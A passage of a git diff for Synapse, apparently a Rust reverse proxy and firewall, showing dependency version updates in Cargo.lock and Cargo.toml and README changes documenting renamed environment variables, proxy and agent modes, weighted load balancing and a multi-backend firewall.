"registry+https://github.com/rust-lang/crates.io-index" -checksum = "d039ad9159c98b70ecfd540b2573b97f7f52c3e8d9f8ad57a24b916a536975f9" +checksum = "ebe5ef63511595f1344e2d5cfa636d973292adc0eec1f0ad45fae9f0851ab1d4" dependencies = [ "futures-core", "futures-util", - "indexmap 2.12.1", + "indexmap 2.13.0", "pin-project-lite", "slab", "sync_wrapper", @@ -5279,7 +5434,7 @@ checksum = "7490cfa5ec963746568740651ac6781f701c9c5ea257c58e057f3ba8cf69e8da" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -5389,6 +5544,15 @@ version = "0.2.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b" +[[package]] +name = "typemap-ors" +version = "1.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a68c24b707f02dd18f1e4ccceb9d49f2058c2fb86384ef9972592904d7a28867" +dependencies = [ + "unsafe-any-ors", +] + [[package]] name = "typenum" version = "1.19.0" @@ -5397,9 +5561,9 @@ checksum = "562d481066bde0658276a35467c4af00bdc6ee726305698a55b86e61d7ad82bb" [[package]] name = "unicase" -version = "2.8.1" +version = "2.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "75b844d17643ee918803943289730bec8aac480150456169e647ed0b576ba539" +checksum = "dbc4bc3a9f746d862c45cb89d705aa10f187bb96c76001afab07a0d35ce60142" [[package]] name = "unicode-bidi" @@ -5422,12 +5586,27 @@ dependencies = [ "tinyvec", ] +[[package]] +name = "unicode-segmentation" +version = "1.12.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f6ccf251212114b54433ec949fd6a7841275f9ada20dddd2f29e9ceea4501493" + [[package]] name = "unicode-xid" version = "0.2.6" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ebc1c04c71510c7f702b52b7c350734c9ff1295c464a03335b00bb84fc54f853" +[[package]] +name = "unsafe-any-ors" +version = "1.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e0a303d30665362d9680d7d91d78b23f5f899504d4f08b3c4cf08d055d87c0ad" +dependencies = [ + "destructure_traitobject", +] + [[package]] name = "unsafe-libyaml" version = "0.2.11" @@ -5478,9 +5657,9 @@ checksum = "06abde3611657adf66d383f00b093d7faecc7fa57071cce2578660c9f1010821" [[package]] name = "uuid" -version = "1.19.0" +version = "1.20.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e2e054861b4bd027cd373e18e8d8d8e6548085000e41290d95ce0c373a654b4a" +checksum = "ee48d38b119b0cd71fe4141b30f5ba9c7c5d9f4e7a3a8b4a674e4b6ef789976f" dependencies = [ "getrandom 0.3.4", "js-sys", @@ -5554,18 +5733,18 @@ checksum = "ccf3ec651a847eb01de73ccad15eb7d99f80485de043efb2f370cd654f4ea44b" [[package]] name = "wasip2" -version = "1.0.1+wasi-0.2.4" +version = "1.0.2+wasi-0.2.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0562428422c63773dad2c345a1882263bbf4d65cf3f42e90921f787ef5ad58e7" +checksum = "9517f9239f02c069db75e65f174b3da828fe5f5b945c4dd26bd25d89c03ebcf5" dependencies = [ "wit-bindgen", ] [[package]] name = "wasm-bindgen" -version = "0.2.105" +version = "0.2.108" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "da95793dfc411fbbd93f5be7715b0578ec61fe87cb1a42b12eb625caa5c5ea60" +checksum = "64024a30ec1e37399cf85a7ffefebdb72205ca1c972291c51512360d90bd8566" dependencies = [ "cfg-if", "once_cell", @@ -5576,11 +5755,12 @@ dependencies = [ [[package]] name = "wasm-bindgen-futures" -version = "0.4.55" +version = "0.4.58" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "551f88106c6d5e7ccc7cd9a16f312dd3b5d36ea8b4954304657d5dfba115d4a0" +checksum = "70a6e77fd0ae8029c9ea0063f87c46fde723e7d887703d74ad2616d792e51e6f" dependencies = [ "cfg-if", + "futures-util", "js-sys", "once_cell", "wasm-bindgen", @@ -5589,9 +5769,9 @@ dependencies = [ [[package]] name = "wasm-bindgen-macro" -version = "0.2.105" +version = "0.2.108" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "04264334509e04a7bf8690f2384ef5265f05143a4bff3889ab7a3269adab59c2" +checksum = "008b239d9c740232e71bd39e8ef6429d27097518b6b30bdf9086833bd5b6d608" dependencies = [ "quote", "wasm-bindgen-macro-support", @@ -5599,31 +5779,31 @@ dependencies = [ [[package]] name = "wasm-bindgen-macro-support" -version = "0.2.105" +version = "0.2.108" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "420bc339d9f322e562942d52e115d57e950d12d88983a14c79b86859ee6c7ebc" +checksum = "5256bae2d58f54820e6490f9839c49780dff84c65aeab9e772f15d5f0e913a55" dependencies = [ "bumpalo", "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", "wasm-bindgen-shared", ] [[package]] name = "wasm-bindgen-shared" -version = "0.2.105" +version = "0.2.108" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "76f218a38c84bcb33c25ec7059b07847d465ce0e0a76b995e134a45adcb6af76" +checksum = "1f01b580c9ac74c8d8f0c0e4afb04eeef2acf145458e52c03845ee9cd23e3d12" dependencies = [ "unicode-ident", ] [[package]] name = "web-sys" -version = "0.3.82" +version = "0.3.85" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3a1f95c0d03a47f4ae1f7a64643a6bb97465d9b740f0fa8f90ea33915c99a9a1" +checksum = "312e32e551d92129218ea9a2452120f4aabc03529ef03e4d0d82fb2780608598" dependencies = [ "js-sys", "wasm-bindgen", @@ -5641,9 +5821,9 @@ dependencies = [ [[package]] name = "webpki-root-certs" -version = "1.0.4" +version = "1.0.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ee3e3b5f5e80bc89f30ce8d0343bf4e5f12341c51f3e26cbeecbc7c85443e85b" +checksum = "36a29fc0408b113f68cf32637857ab740edfafdf460c326cd2afaa2d84cc05dc" dependencies = [ "rustls-pki-types", ] @@ -5711,7 +5891,7 @@ checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb" dependencies = [ "windows-implement", "windows-interface", - "windows-link 0.2.1", + "windows-link", "windows-result", "windows-strings", ] @@ -5724,7 +5904,7 @@ checksum = "053e2e040ab57b9dc951b72c264860db7eb3b0200ba345b4e4c3b14f67855ddf" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -5735,15 +5915,9 @@ checksum = "3f316c4a2570ba26bbec722032c4099d8c8bc095efccdc15688708623367e358" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] -[[package]] -name = "windows-link" -version = "0.1.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5e6ad25900d524eaabdbbb96d20b4311e1e7ae1699af4fb28c17ae66c80d798a" - [[package]] name = "windows-link" version = "0.2.1" @@ -5756,7 +5930,7 @@ version = "0.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "02752bf7fbdcce7f2a27a742f798510f3e5ad88dbe84871e5168e2120c3d5720" dependencies = [ - "windows-link 0.2.1", + "windows-link", "windows-result", "windows-strings", ] @@ -5767,7 +5941,7 @@ version = "0.4.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7781fa89eaf60850ac3d2da7af8e5242a5ea78d1a11c49bf2910bb5a73853eb5" dependencies = [ - "windows-link 0.2.1", + "windows-link", ] [[package]] @@ -5776,7 +5950,7 @@ version = "0.5.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7837d08f69c77cf6b07689544538e017c1bfcf57e34b4c0ff58e6c2cd3b37091" dependencies = [ - "windows-link 0.2.1", + "windows-link", ] [[package]] @@ -5830,7 +6004,7 @@ version = "0.61.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ae137229bcbd6cdf0f7b80a31df61766145077ddf49416a728b02cb3921ff3fc" dependencies = [ - "windows-link 0.2.1", + "windows-link", ] [[package]] @@ -5885,7 +6059,7 @@ version = "0.53.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "4945f9f551b88e0d65f3db0bc25c33b8acea4d9e41163edf90dcd0b19f9069f3" dependencies = [ - "windows-link 0.2.1", + "windows-link", "windows_aarch64_gnullvm 0.53.1", "windows_aarch64_msvc 0.53.1", "windows_i686_gnu 0.53.1", @@ -6078,9 +6252,9 @@ checksum = "d6bbff5f0aada427a1e5a6da5f1f98158182f26556f345ac9e04d36d0ebed650" [[package]] name = "winnow" -version = "0.7.13" +version = "0.7.14" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "21a0236b59786fed61e2a80582dd500fe61f18b5dca67a4a067d0bc9039339cf" +checksum = "5a5364e9d77fcdeeaa6062ced926ee3381faa2ee02d3eb83a5c27a8825540829" dependencies = [ "memchr", ] @@ -6121,9 +6295,9 @@ dependencies = [ [[package]] name = "wit-bindgen" -version = "0.46.0" +version = "0.51.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f17a85883d4e6d00e8a97c586de764dabcc06133f7f1d55dce5cdc070ad7fe59" +checksum = "d7249219f66ced02969388cf2bb044a09756a083d0fab1e566056b04d9fbcaa5" [[package]] name = "writeable" @@ -6138,13 +6312,14 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "eb3e137310115a65136898d2079f003ce33331a6c4b0d51f1531d1be082b6425" dependencies = [ "asn1-rs", + "aws-lc-rs", "data-encoding", "der-parser", "lazy_static", "nom", "oid-registry", "rusticata-macros", - "thiserror 2.0.17", + "thiserror 2.0.18", "time", ] @@ -6191,28 +6366,28 @@ checksum = "b659052874eb698efe5b9e8cf382204678a0086ebf46982b79d6ca3182927e5d" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", "synstructure", ] [[package]] name = "zerocopy" -version = "0.8.28" +version = "0.8.37" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "43fa6694ed34d6e57407afbccdeecfa268c470a7d2a5b0cf49ce9fcc345afb90" +checksum = "7456cf00f0685ad319c5b1693f291a650eaf345e941d082fc4e03df8a03996ac" dependencies = [ "zerocopy-derive", ] [[package]] name = "zerocopy-derive" -version = "0.8.28" +version = "0.8.37" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c640b22cd9817fae95be82f0d2f90b11f7605f6c319d16705c459b27ac2cbc26" +checksum = "1328722bbf2115db7e19d69ebcc15e795719e2d66b60827c6a69a117365e37a0" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] @@ -6232,7 +6407,7 @@ checksum = "d71e5d6e06ab090c67b5e44993ec16b72dcbaabc526db883a360057678b48502" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", "synstructure", ] @@ -6272,14 +6447,14 @@ checksum = "eadce39539ca5cb3985590102671f2567e659fca9666581ad3411d59207951f3" dependencies = [ "proc-macro2", "quote", - "syn 2.0.111", + "syn 2.0.114", ] [[package]] name = "zmij" -version = "1.0.3" +version = "1.0.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e9747e91771f56fd7893e1164abd78febd14a670ceec257caad15e051de35f06" +checksum = "1966f8ac2c1f76987d69a74d0e0f929241c10e78136434e3be70ff7f58f64214" [[package]] name = "zstd" diff --git a/Cargo.toml b/Cargo.toml index 81a17b9..1ac2fb1 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -21,13 +21,13 @@ tokio = { version = "1", features = [ "io-util", "signal", "sync", + "fs", ] } anyhow = "1" hyper = { version = "1", features = ["http1", "server"] } hyper-util = { version = "0.1", features = [ "server", "tokio", - "client-legacy", "http1", ] } http-body-util = "0.1" @@ -35,8 +35,9 @@ plain = "0.2.3" serde = { version = "1", features = ["derive"] } serde_json = "1" serde_yaml = "0.9" +serde_ignored = "0.1" clap = { version = "4.5.54", features = ["derive"] } -nix = { version = "0.30.0", features = ["net", "fs"] } +nix = { version = "0.31.1", features = ["net", "fs"] } redis = { version = "1.0", features = ["tokio-native-tls-comp", "connection-manager", "r2d2"]} native-tls = "0.2" tokio-rustls = "0.26.4" @@ -66,8 +67,10 @@ local-ip-address = "0.6.9" flate2 = "1.1" log = "0.4.29" env_logger = { version = "0.11", default-features = false, features = ["auto-color", "humantime"] } +log4rs = { version = "1.3", features = ["console_appender", "file_appender", "rolling_file_appender", "json_encoder", "gzip"] } +syslog = "7.0" jsonwebtoken = { version = "10.1", features = ["rust_crypto"] } -uuid = { version = "1.19", features = ["v4", "serde"] } +uuid = { version = "1.20", features = ["v4", "serde"] } url = "2.5" clamav-tcp = "0.2" multer = "3.0" @@ -76,9 +79,6 @@ rand = "0.9" regex = "1.0" daemonize = "0.5.0" -[target.'cfg(unix)'.dependencies] -libbpf-rs = { version = "0.25.0", optional = true } - # pingora = { path = "../pingora/pingora", features = ["lb", "openssl", "proxy"] } # pingora-core = { path = "../pingora/pingora-core" } # pingora-proxy = { path = "../pingora/pingora-proxy" } @@ -94,10 +94,14 @@ pingora-limits = { git = "https://github.com/gen0sec/pingora", rev = "c92146d621 pingora-http = { git = "https://github.com/gen0sec/pingora", rev = "c92146d621542303dd9b93a4cb5252e1eef46c81"} pingora-memory-cache = { git = "https://github.com/gen0sec/pingora", rev = "c92146d621542303dd9b93a4cb5252e1eef46c81"} +# JA4+ fingerprinting library +# nstealth = { path = "../nstealth" } +nstealth = { git = "https://github.com/gen0sec/nstealth", rev = "3c87751b9d9537b055a119f155a730360a7d0078" } + mimalloc = { version = "0.1.48", default-features = false } dashmap = "7.0.0-rc2" ctrlc = "3.5.0" -arc-swap = "1.7.1" +arc-swap = "1.8.0" prometheus = "0.14.0" once_cell = "1.21.3" maxminddb = "0.27" @@ -105,13 +109,12 @@ memmap2 = "0.9" axum-server = { version = "0.8.0", features = ["tls-openssl"] } axum = { version = "0.8.8" } tower-http = { version = "0.6.8", features = ["fs"] } +urlencoding = "2.1" tonic = "0.14.2" port_check = "0.3.0" notify = "8.2.0" privdrop = "0.5.6" -base16ct = { version = "0.3.0", features = ["alloc"] } -nftables = "0.6" -iptables = "0.5" +base16ct = { version = "1.0.0", features = ["alloc"] } actix-web = "4.12" actix-files = "0.6" instant-acme = "0.8" @@ -119,6 +122,13 @@ trust-dns-resolver = "0.23.2" tracing = "0.1" tracing-subscriber = "0.3" +[target.'cfg(unix)'.dependencies] +libbpf-rs = { version = "0.25.0", optional = true } + +[target.'cfg(target_os = "linux")'.dependencies] +nftables = "0.6" +iptables = "0.6" + [dev-dependencies] serial_test = "3.3" diff --git a/README.md b/README.md index dec8125..9f4a523 100644 --- a/README.md +++ b/README.md @@ -18,16 +18,19 @@ Synapse is a high-performance reverse proxy and firewall built with Rust, featuring: - **XDP-based packet filtering** for ultra-low latency protection at kernel level +- **Multi-backend firewall** with automatic fallback (XDP > nftables > iptables > userland) - **Dynamic access rules** with automatic updates from Gen0Sec API - **BPF statistics collection** for packet processing and dropped IP monitoring - **TCP fingerprinting** for behavioral analysis and threat detection - **TLS fingerprinting** with JA4 support for client identification - **JA4+ fingerprinting** with complete suite: JA4H (HTTP headers), JA4T (TCP options), JA4L (latency), JA4S (TLS server), and JA4X (X.509 certificates) -- **Automatic TLS certificate management** with ACME/Let's Encrypt integration -- **Threat intelligence integration** with Gen0Sec API for real-time protection +- **Automatic TLS certificate management** with ACME/Let's Encrypt integration (HTTP-01 and DNS-01 challenges) +- **Threat intelligence integration** with Gen0Sec API and Threat MMDB for real-time protection +- **GeoIP MMDB support** for country, ASN, and city-level geolocation - **CAPTCHA protection** with support for hCaptcha, reCAPTCHA, and Cloudflare Turnstile - **Content scanning** with ClamAV integration for malware detection - **PROXY protocol support** for preserving client IP addresses through load balancers +- **Internal services server** for CAPTCHA verification, ACME challenges, and certificate management - **Health check endpoints** for monitoring and load balancer integration - **Redis-backed caching** for certificates, threat intelligence, and validation results - **Domain filtering** with whitelist support @@ -36,6 +39,11 @@ Synapse is a high-performance reverse proxy and firewall built with Rust, featur - **Flexible configuration** via YAML files, command line arguments, or environment variables - **Advanced upstream routing** with service discovery support (file, Consul, Kubernetes) - **Hot-reloadable upstreams configuration** for zero-downtime updates +- **Weighted load balancing** using Pingora's Weighted algorithm for proportional traffic distribution +- **Per-path timeout configuration** for upstream connections +- **File-based logging** with automatic rotation and compression +- **Syslog integration** for centralized log management +- **IPv4/IPv6 dual-stack support** with configurable IP version filtering ## Modes @@ -50,11 +58,11 @@ Synapse can run in two modes: | **Request Forwarding** | ✅ To upstream servers | ❌ Not available | | **Upstream Configuration** | ✅ Required | ❌ Not needed | | **XDP Packet Filtering** | ✅ Kernel-level filtering | ✅ Kernel-level filtering | -| **Fully Supported Firewall** | 🚧 Coming soon | 🚧 Coming soon | +| **Multi-Backend Firewall** | ✅ XDP/nftables/iptables/userland | ✅ XDP/nftables/iptables/userland | | **Access Rules Enforcement** | ✅ IP allow/block lists | ✅ IP allow/block lists | | **Dynamic Access Rules** | ✅ Auto-updates from Gen0Sec API | ✅ Auto-updates from Gen0Sec API | | **Threat Intelligence** | ✅ Real-time threat data | ✅ Real-time threat data | -| **BPF Statistics Collection** | ✅ Packet processing metrics | ✅ Packet processing metrics | +| **BPF Statistics Collection** | ✅ Packet processing metrics (XDP only) | ✅ Packet processing metrics (XDP only) | | **TCP Fingerprinting** | ✅ SYN packet analysis | ✅ SYN packet analysis | | **JA4+ Fingerprinting** | ✅ Complete suite (JA4, JA4H, JA4T, JA4L, JA4S, JA4X) | ⚠️ JA4T only (TCP fingerprinting) | | **Content Scanning (ClamAV)** | ✅ Malware detection | 🚧 Coming soon | @@ -74,16 +82,18 @@ Synapse runs as a full-featured reverse proxy with HTTP/HTTPS support, forwardin **Configuration:** ```yaml -server: - disable_http_server: false # Default: HTTP server enabled - http_addr: "0.0.0.0:80" - tls_addr: "0.0.0.0:443" - upstream: "http://localhost:8080" +mode: "proxy" # or omit (proxy is default) + +proxy: + address_http: "0.0.0.0:80" + address_tls: "0.0.0.0:443" + upstream: + conf: "/etc/synapse/upstreams.yaml" ``` **CLI:** ```bash -synapse --upstream http://localhost:8080 --arxignis-api-key "your-key" +synapse --mode proxy --arxignis-api-key "your-key" ``` ### Agent Mode @@ -92,18 +102,17 @@ Synapse runs as a standalone agent focused on access rules enforcement without H **Configuration:** ```yaml -server: - disable_http_server: true # Disable HTTP server, run as agent +mode: "agent" # Only access rules and monitoring (no proxy) ``` **CLI:** ```bash -synapse --disable-http-server --arxignis-api-key "your-key" +synapse --mode agent --arxignis-api-key "your-key" ``` **Environment Variable:** ```bash -export AX_SERVER_DISABLE_HTTP_SERVER=true +export MODE=agent ``` **Use Cases:** @@ -118,7 +127,7 @@ Synapse supports three configuration methods with the following priority (highes 1. **YAML Configuration File** - Comprehensive configuration via `config.yaml` 2. **Command Line Arguments** - Override specific settings via CLI flags -3. **Environment Variables** - Set configuration via `AX_*` prefixed environment variables +3. **Environment Variables** - Set configuration via environment variables Configuration from higher priority sources overrides lower priority sources. For example, a YAML file setting will override the same setting from an environment variable. @@ -196,85 +205,70 @@ You have 3 options can configure synapse. ### Environment Variables -All configuration options can be overridden using environment variables with the `AX_` prefix: +All configuration options can be overridden using environment variables: ```bash -# Server configuration -export AX_SERVER_UPSTREAM="http://localhost:8080" -export AX_SERVER_HTTP_ADDR="0.0.0.0:80" -export AX_SERVER_TLS_ADDR="0.0.0.0:443" -export AX_SERVER_DISABLE_HTTP_SERVER="false" - -# TLS configuration -export AX_TLS_MODE="acme" -export AX_TLS_ONLY="false" - -# ACME configuration -export AX_ACME_DOMAINS="example.com,www.example.com" -export AX_ACME_CONTACTS="admin@example.com" -export AX_ACME_USE_PROD="true" +# Application mode +export MODE="proxy" # or "agent" # Redis configuration -export AX_REDIS_URL="redis://127.0.0.1/0" -export AX_REDIS_PREFIX="ax:synapse" +export REDIS_URL="redis://127.0.0.1/0" +export REDIS_PREFIX="ax:synapse" # Network configuration -export AX_NETWORK_IFACE="eth0" -export AX_NETWORK_DISABLE_XDP="false" +export NETWORK_IFACE="eth0" +export NETWORK_IFACES="eth0,eth1" # Multiple interfaces (comma-separated) +export NETWORK_IP_VERSION="both" # ipv4, ipv6, or both +export FIREWALL_MODE="auto" # auto, xdp, nftables, iptables, none +export FIREWALL_DISABLE_XDP="false" -# Gen0Sec configuration -export AX_ARXIGNIS_API_KEY="your-api-key" -export AX_ARXIGNIS_BASE_URL="https://api.gen0sec.com/v1" -export AX_ARXIGNIS_LOG_SENDING_ENABLED="true" -export AX_ARXIGNIS_INCLUDE_RESPONSE_BODY="true" -export AX_ARXIGNIS_MAX_BODY_SIZE="1048576" +# Gen0Sec Platform configuration +export API_KEY="your-api-key" +export BASE_URL="https://api.gen0sec.com/v1" +export LOG_SENDING_ENABLED="true" # CAPTCHA configuration -export AX_CAPTCHA_SITE_KEY="your-site-key" -export AX_CAPTCHA_SECRET_KEY="your-secret-key" -export AX_CAPTCHA_JWT_SECRET="your-jwt-secret" -export AX_CAPTCHA_PROVIDER="turnstile" +export CAPTCHA_SITE_KEY="your-site-key" +export CAPTCHA_SECRET_KEY="your-secret-key" +export CAPTCHA_JWT_SECRET="your-jwt-secret" +export CAPTCHA_PROVIDER="turnstile" +export CAPTCHA_TOKEN_TTL="7200" +export CAPTCHA_CACHE_TTL="300" # Content scanning -export AX_CONTENT_SCANNING_ENABLED="true" -export AX_CLAMAV_SERVER="localhost:3310" -export AX_CONTENT_MAX_FILE_SIZE="10485760" -export AX_CONTENT_SCAN_CONTENT_TYPES="text/html,application/x-www-form-urlencoded,multipart/form-data" -export AX_CONTENT_SKIP_EXTENSIONS=".jpg,.png,.gif" - -# Domain filtering -export AX_DOMAINS_WHITELIST="trusted.com,secure.example.com" - -# Health check configuration -export AX_SERVER_HEALTH_CHECK_ENABLED="true" -export AX_SERVER_HEALTH_CHECK_ENDPOINT="/health" -export AX_SERVER_HEALTH_CHECK_PORT="0.0.0.0:8080" -export AX_SERVER_HEALTH_CHECK_METHODS="GET,HEAD" -export AX_SERVER_HEALTH_CHECK_ALLOWED_CIDRS="127.0.0.0/8,::1/128" - -# BPF Statistics -export AX_BPF_STATS_ENABLED="true" -export AX_BPF_STATS_LOG_INTERVAL="60" -export AX_BPF_STATS_ENABLE_DROPPED_IP_EVENTS="true" -export AX_BPF_STATS_DROPPED_IP_EVENTS_INTERVAL="30" - -# TCP Fingerprinting -export AX_TCP_FINGERPRINT_ENABLED="true" -export AX_TCP_FINGERPRINT_LOG_INTERVAL="60" -export AX_TCP_FINGERPRINT_ENABLE_FINGERPRINT_EVENTS="true" -export AX_TCP_FINGERPRINT_EVENTS_INTERVAL="30" -export AX_TCP_FINGERPRINT_MIN_PACKET_COUNT="3" -export AX_TCP_FINGERPRINT_MIN_CONNECTION_DURATION="1" +export CONTENT_SCANNING_ENABLED="true" +export CLAMAV_SERVER="localhost:3310" +export CONTENT_MAX_FILE_SIZE="10485760" +export CONTENT_SCAN_CONTENT_TYPES="text/html,application/x-www-form-urlencoded,multipart/form-data" +export CONTENT_SKIP_EXTENSIONS=".jpg,.png,.gif" +export CONTENT_SCAN_EXPRESSION="http.request.method eq \"POST\" or http.request.method eq \"PUT\"" + +# Internal services configuration +export INTERNAL_SERVICES_ENABLED="true" +export INTERNAL_SERVICES_PORT="9180" +export INTERNAL_SERVICES_BIND_IP="127.0.0.1" + +# PROXY protocol configuration +export PROXY_PROTOCOL_ENABLED="true" +export PROXY_PROTOCOL_TIMEOUT="1000" # Daemon mode -export AX_DAEMON_ENABLED="false" -export AX_DAEMON_PID_FILE="/var/run/synapse.pid" -export AX_DAEMON_WORKING_DIRECTORY="/" -export AX_DAEMON_STDOUT="/var/log/synapse/access.log" -export AX_DAEMON_STDERR="/var/log/synapse/error.log" +export DAEMON_ENABLED="false" +export DAEMON_PID_FILE="/var/run/synapse.pid" +export DAEMON_WORKING_DIRECTORY="/" +export DAEMON_USER="root" +export DAEMON_GROUP="root" +export DAEMON_CHOWN_PID_FILE="true" # Logging -export AX_LOGGING_LEVEL="info" +export LOGGING_LEVEL="info" +export LOGGING_FILE_ENABLED="true" +export LOGGING_DIRECTORY="/var/log/synapse" +export LOGGING_MAX_FILE_SIZE="104857600" +export LOGGING_FILE_COUNT="10" +export LOGGING_SYSLOG_ENABLED="false" +export LOGGING_SYSLOG_FACILITY="daemon" +export LOGGING_SYSLOG_IDENTIFIER="synapse" ``` For a complete list of all available environment variables, see [ENVIRONMNET_VARS.md](./docs/ENVIRONMNET_VARS.md). @@ -286,8 +280,9 @@ Synapse supports advanced upstream routing via a separate upstreams configuratio **Features:** - **Multiple service discovery providers** - File-based, Consul, and Kubernetes service discovery - **Global configuration** - Sticky sessions, rate limits, and headers applied globally -- **Gen0Sec paths** - Global paths that work across all hostnames (evaluated before hostname-specific routing) +- **Internal paths** - Global paths that work across all hostnames (evaluated before hostname-specific routing) - **Per-path configuration** - Rate limits, headers, and HTTPS redirects per path +- **Weighted load balancing** - Proportional traffic distribution based on server weights - **Hot-reloading** - Configuration changes apply immediately without service restart **Configuration File:** @@ -302,25 +297,45 @@ config: https_proxy_enabled: false sticky_sessions: true global_rate_limit: 100 - global_headers: - - "Access-Control-Allow-Origin:*" + global_request_headers: - "X-Proxy-From:Synapse" + global_response_headers: + - "Access-Control-Allow-Origin:*" -arxignis_paths: +internal_paths: "/cgi-bin/captcha/verify": rate_limit: 200 servers: - - "127.0.0.1:3001" + - "127.0.0.1:9180" upstreams: example.com: certificate: "example.com" + acme: + challenge_type: "dns-01" # or "http-01" (default) + email: "admin@example.com" + wildcard: true # Required for wildcard certificates paths: "/": rate_limit: 200 + force_https: true # Redirect HTTP to HTTPS + ssl_enabled: true # Use HTTPS for upstream connection + request_headers: + - "Host: api.example.com" + # Per-path timeout configuration (in seconds) + connection_timeout: 30 # Time to establish connection (default: 30) + read_timeout: 120 # Time to wait for response (default: 120) + write_timeout: 30 # Time to send request (default: 30) + idle_timeout: 60 # Keep connection alive for reuse (default: 60) servers: + # Simple format (weight = 1, equal distribution) - "127.0.0.1:8000" - - "127.0.0.1:8001" + # Weighted format (gets 3x more traffic) + - address: "127.0.0.1:8001" + weight: 3 + # Another weighted server (gets 2x more traffic) + - address: "127.0.0.1:8002" + weight: 2 ``` **Kubernetes Service Discovery:** @@ -367,6 +382,60 @@ consul: - [upstreams_example_kubernetes.yaml](./upstreams_example_kubernetes.yaml) - Kubernetes service discovery - [upstreams_example_consul.yaml](./upstreams_example_consul.yaml) - Consul service discovery +### Weighted Load Balancing + +Synapse supports weighted load balancing using Pingora's Weighted algorithm, allowing you to distribute traffic proportionally across upstream servers based on their capacity or priority. + +**How it works:** +- Each server can be assigned a weight (default: 1 for equal distribution) +- Traffic is distributed proportionally based on weights +- Uses Pingora's Weighted algorithm for efficient selection +- Automatically falls back to simple round-robin when all weights are equal (optimization) + +**Configuration:** + +Servers can be configured in two formats: + +1. **Simple string format** (weight defaults to 1): +```yaml +servers: + - "127.0.0.1:8000" + - "127.0.0.1:8001" +``` + +2. **Object format with explicit weight**: +```yaml +servers: + - address: "127.0.0.1:8000" + weight: 1 + - address: "127.0.0.1:8001" + weight: 3 # Gets 3x more traffic than server 1 + - address: "127.0.0.1:8002" + weight: 2 # Gets 2x more traffic than server 1 +``` + +**Example:** + +In this configuration, server `8001` will receive 3x more traffic than `8000`, and `8002` will receive 2x more: +```yaml +upstreams: + api.example.com: + paths: + "/": + servers: + - "127.0.0.1:8000" # Weight: 1 (25% of traffic) + - address: "127.0.0.1:8001" # Weight: 3 (50% of traffic) + weight: 3 + - address: "127.0.0.1:8002" # Weight: 2 (25% of traffic) + weight: 2 +``` + +**Use cases:** +- **Capacity-based distribution** - Route more traffic to servers with higher capacity +- **Gradual rollout** - Gradually increase traffic to new servers +- **Priority routing** - Prefer certain servers for critical traffic +- **A/B testing** - Distribute traffic between different server versions + ## Command Line Options ### Basic Usage @@ -383,12 +452,15 @@ synapse --help ### Threat Intelligence Integration -Synapse integrates with Gen0Sec API to provide real-time threat intelligence: +Synapse integrates with Gen0Sec API and Threat MMDB to provide real-time threat intelligence: - **IP reputation scoring** - Automatic scoring of incoming IP addresses - **Bot detection** - Advanced bot detection and mitigation - **Geolocation filtering** - Block or allow traffic based on geographic location - **Threat context** - Rich context about detected threats +- **Threat MMDB** - Local MaxMind database for offline threat intelligence lookups +- **GeoIP MMDB** - Country, ASN, and city-level geolocation databases +- **Automatic database updates** - Periodic refresh of MMDB files from download servers - **Caching** - Redis-backed caching for improved performance - **Dynamic access rules** - Automatic updates of access rules (allow/block lists) from Gen0Sec API - **JA4/JA4+ fingerprinting** - Complete JA4+ suite implementation: @@ -405,8 +477,10 @@ Kernel-level IP filtering with automatic updates: - **Allow/Block lists** - Configure IP addresses, ASNs, and countries for allow/block rules - **Automatic updates** - Rules are fetched from Gen0Sec API and updated periodically +- **Multi-backend firewall** - Automatic fallback: XDP > nftables > iptables > userland - **BPF map integration** - Rules are enforced at kernel level via XDP for maximum performance - **IPv4 and IPv6 support** - Both IP versions are supported with separate rule sets +- **IP version filtering** - Configure to process IPv4 only, IPv6 only, or both - **Recently banned tracking** - Track recently banned IPs for UDP, ICMP, and TCP FIN/RST packets - **Zero downtime updates** - Rules are updated without interrupting traffic @@ -422,12 +496,12 @@ Advanced request filtering with powerful expression language: ### ⚠️ Degraded Features When Access Logs Disabled -When access log sending is disabled (`AX_ARXIGNIS_LOG_SENDING_ENABLED=false` or `--arxignis-log-sending-enabled=false`), the following features are degraded: +When access log sending is disabled (`LOG_SENDING_ENABLED=false` or 